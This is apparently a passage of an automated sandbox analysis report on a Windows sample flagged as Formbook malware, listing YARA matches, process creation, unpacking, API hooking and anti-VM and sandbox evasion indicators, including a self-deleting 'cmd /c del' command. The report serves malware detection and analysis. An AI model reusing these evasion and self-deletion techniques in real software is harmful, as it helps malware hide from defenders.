          Source: zHgm9k7WYU.exe, 00000000.00000002.261046059.0000000005170000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameAssemblyReferenceEntry.exeD vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.254306135.00000000029E0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameTypeLibImporterFlags.dll4 vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000000.00000002.261473078.00000000054D0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exeBinary or memory string: OriginalFilename vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.290950231.0000000000ED2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exe, 00000001.00000002.297873498.000000000396E000.00000040.00000001.sdmpBinary or memory string: OriginalFilenameEXPLORER.EXEj% vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exeBinary or memory string: OriginalFilenameXe.exeB vs zHgm9k7WYU.exe
          Source: zHgm9k7WYU.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.290306069.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.294049960.0000000001980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.571651184.00000000038B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.294025157.0000000001950000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.568319249.00000000010A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.257876655.0000000003F0D000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.572123843.00000000051A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zHgm9k7WYU.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.zHgm9k7WYU.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: zHgm9k7WYU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/1@6/5
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zHgm9k7WYU.exe.logJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5024:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: zHgm9k7WYU.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess created: C:\Users\user\Desktop\zHgm9k7WYU.exe {path}Jump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\zHgm9k7WYU.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: zHgm9k7WYU.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: zHgm9k7WYU.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
          Source: zHgm9k7WYU.exeStatic file information: File size 1081344 > 1048576
          Source: zHgm9k7WYU.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x107400
          Source: zHgm9k7WYU.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe, 00000007.00000002.574401869.000000000567F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: zHgm9k7WYU.exe, 00000001.00000002.294215275.0000000001B2F000.00000040.00000001.sdmp, explorer.exe
          Source: Binary string: explorer.pdb source: zHgm9k7WYU.exe, 00000001.00000002.297137700.0000000003620000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.582881514.0000000007100000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeUnpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs Unknown_Section0:ER;Unknown_Section1:R;Unknown_Section2:R;
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeUnpacked PE file: 0.2.zHgm9k7WYU.exe.5b0000.0.unpack
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_005B5DF5 push esp; iretd 0_2_005B5DFB
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_005B39AE push edi; retf 0_2_005B39AF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EC208 push eax; iretd 0_2_057EC209
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 0_2_057EA8EF push E802E15Eh; retf 0_2_057EA901
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00405906 push esp; iretd 1_2_0040590B
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00416BA6 pushfd ; iretd 1_2_00416BA7
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00417694 push esi; iretd 1_2_00417699
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CEB5 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CF6C push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CF02 push eax; ret 1_2_0041CF08
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_0041CF0B push eax; ret 1_2_0041CF72
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00ED39AE push edi; retf 1_2_00ED39AF
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00ED5DF5 push esp; iretd 1_2_00ED5DFB
          Source: C:\Windows\explorer.exeCode function: 2_2_074BF3E6 pushad ; ret 2_2_074BF3E7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_055DD0D1 push ecx; ret 7_2_055DD0E4
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010A5906 push esp; iretd 7_2_010A590B
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B6BA6 pushfd ; iretd 7_2_010B6BA7
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCF0B push eax; ret 7_2_010BCF72
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCF02 push eax; ret 7_2_010BCF08
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCF6C push eax; ret 7_2_010BCF72
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010B7694 push esi; iretd 7_2_010B7699
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 7_2_010BCEB5 push eax; ret 7_2_010BCF08
          Source: initial sampleStatic PE information: section name: .text entropy: 7.44897781491

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8B 0xBE 0xE4
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM_3Show sources
          Source: Yara matchFile source: 00000000.00000002.254778297.0000000002D31000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: zHgm9k7WYU.exe PID: 1928, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000010A98E4 second address: 00000000010A98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000010A9B5E second address: 00000000010A9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeCode function: 1_2_00409A90 rdtsc 1_2_00409A90
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 2260Thread sleep time: -31500s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\zHgm9k7WYU.exe TID: 4132Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 5256Thread sleep count: 45 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 5256Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\explorer.exe TID: 4396Thread sleep time: -90000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMware
          Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000002.00000000.257951536.00000000011EE000.00000004.00000020.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000002.00000000.273817889.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: explorer.exe, 00000002.00000002.569426220.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: zHgm9k7WYU.exe, 00000000.00000002.255645740.0000000002E48000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000002.00000002.569770754.00000000011EE000.00000004.00000020.sdmpBinary or memory string: @%SystemRoot%\System32\mswsock.dll,-60102-9%SystemRoot%\system32\mswsock.dlle6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&
          Source: explorer.exe, 00000002.00000000.273897961.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 00000002.00000002.580860292.00000000053D7000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 00000002.00000000.272926812.0000000008270000.00000002.0000